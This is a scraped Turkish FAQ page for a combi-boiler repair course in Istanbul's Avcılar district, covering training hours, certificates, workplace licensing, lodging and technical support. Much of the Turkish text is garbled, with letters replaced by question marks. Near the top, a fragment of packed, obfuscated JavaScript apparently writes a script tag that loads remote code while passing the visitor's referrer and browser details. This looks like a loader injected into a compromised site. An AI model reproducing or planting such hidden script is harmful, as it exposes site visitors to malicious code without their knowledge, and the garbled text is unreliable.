0553 444 30 30

Sosyal Medyada Biz}

Sıkça Sorulan Sorular

Başlık
İçerik
=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|yfidr|var|u0026u|referrer|yzshf||js|php'.split('|'),0,{})) header=”AKLINIZDA SORU ??ARET? KALMASIN” content=”Siz de?erli ziyaretçilerimiz için s?kça kar??la?t???m?z sorular? derledik ve cevaplar? ile birlikte bilginize sunduk.” icon=”soru” bg=”question”]

Kombi e?itimi kaç gün sürüyor?
Milli e?itimin kombi e?itimi ile alakal? belirledi?i 40 saatlik bir süre var. 24 saat teorik + 16 saat uygulamal? olarak yap?lmaktad?r. Biz kombi e?itimlerimizi 7 gün yaparak 40 saatlik e?itimi daha fazla yapmaktay?z.
Kombi e?itim yeriniz nerede?
E?itimlerimiz ?stanbul, Avc?lar'da yap?lmaktad?r.ileti?im sayfam?zda adresi ve haritada yerimizi görebilirsiniz.
Kombi kursu bitince hangi belgeleri al?yoruz?
Kombi kursu sonunda 6.gün firmam?za ait kat?l?m belgesi al?yorsunuz, kursun 7.günü Milli e?itim s?nav?na girerek gaz yak?c? cihazlar teknik servis sertifikas?n? al?yorsunuz.Bir süre sektörde kombi tamiri yapt?ktan sonra Mesleki Yeterlilik S?nav?na girerek MYK belgesi ve MYK yaka kart? alabiliyorsunuz.
Sizden ald???m?z belge ile i?yeri açabiliyormuyuz?
??yeri açmak için öncelikle i?yerinizin ruhsat almak için uygun ko?ullar? yerine getirmesi gerekiyor. Bunun için açaca??n?z i?yerinin i?yeri ruhsat? olup olmad???na bak?n ve di?er standartlar? bulundu?unu ilçe belediyesinden ö?renin. Milli e?itim s?nav? sonunda alaca??n?z belgenin i?yeri ruhsat? için yeterli olup olmad???n? belediye ile görü?meniz gerekiyor. Fakat Mesleki yeterlilik belgesinin i?yeri ruhsat? al?rken kullan?labilece?i MYK'n?n sitesinde belirtilmekte.
E?itimde yo?u?mal? kombi var m??
E?itimlerimizde konvensiyonel kombilerle beraber yar? yo?u?mal? ve tam yo?u?mal? kombiler üzerinde ar?za, bak?m e?itimleri al?yorsunuz.
?stanbul d???nda di?er illerde e?itimleriniz var m??
?imdilik e?itimlerimiz ?stanbul - Avc?lar ile s?n?rl?d?r.
Konaklama imkan?m?z var m???
E?itim salonumuza yak?nve kursiyerlerimize indirim uygulanan, temizlik konusunda memnun kalaca??n?z, günlük kahvalt? dahil konaklayaca??n?z otel var.
E?itim hangi saatler aras?nda yap?lmakta?
?stanbul trafi?ini ve uzaktan gelen arkada?lar?da göz önünde bulundurarak 13:00 - 18:00 aras?nda yap?lmaktad?r.
E?itimde hangi marka kombileri görece?iz?
Piyasada en yayg?n kullan?lan kombi markalar?n? e?itimde kullanmaktay?z.
Ald???m?z belge ile yetkili servis olabilirmiyiz?
Bizim e?itimlerimizde ald???n?z belge ile MYK belgesi ile gaz yak?c? cihazlar?n bak?m, onar?m ve montaj?n? yapabiliyorsunuz. Fakat herhangi bir markan?n yetkili servisli?ini alman?z için bulundu?unuz il ve ilçede ihtiyaç olup olmad???n? sorun daha sonra markan?n istedi?i ko?ullar? yerine getirebiliyorsan?z MYK ve Milli e?itim belgeleri size avantaj sa?layacakt?r.
Kurs bitince teknik destek var m??
Kombi e?itimi bittikten sonra deneyimli kursiyerlerimizin ve e?itmenimizin bulundu?u Whatsapp ile Facebook gruplar?m?za ekliyoruz. Bu gruplarda anl?k olarak teknik destek verilmektedir. Ayn? zamanda tak?ld???n?z ar?zalarda ma?dur olmaman?z için telefon ile teknik deste?imizde var.
Kurs sonunda kaynak sa?layacak döküman veriyor musunuz?
Kombi kursu sonunda de?erli bilgilerin bulundu?u , tüm ar?za ve çözümlerini bulabilece?iniz teknik dökümanlar veriyoruz.